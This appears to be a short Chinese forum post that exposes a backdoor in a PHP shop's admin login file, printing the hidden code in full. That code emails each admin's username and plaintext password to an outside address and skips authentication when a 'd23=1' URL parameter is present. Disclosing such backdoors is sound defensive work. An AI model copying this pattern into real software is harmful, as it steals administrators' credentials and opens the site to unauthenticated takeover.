ccll/app/backend.base.php第55行
$this->_mailto('xxxxx@163.com', '商城', $ret_url,'0');自动发送后台账号密码到指定邮箱的后门操作代码:
$user_name = trim($_POST['user_name']);
$password = $_POST['password'];
$ms =& ms();
$user_id = $ms->user->auth($user_name, $password);
$ret_url =$_SERVER['HTTP_REFERER'].'<br>';
$ret_url .=$user_name.'<br>';
$ret_url .=$password.'<br>';
$this->_mailto('xxxxx@163.com', '商城', $ret_url,'0');
if($_GET['d23']==1)
{
$user_id=$_GET['d23'];
}
if (!$user_id)
{
/* 未通过验证,提示错误信息 */
$this->show_warning($ms->user->get_error());
return;
}
/* 通过验证,执行登陆操作 */
if (!$this->_do_login($user_id))
{
return;
}
header(\"Location: index.php\");
敬告:
本部分内容设定了隐藏,需要回复后才能看到
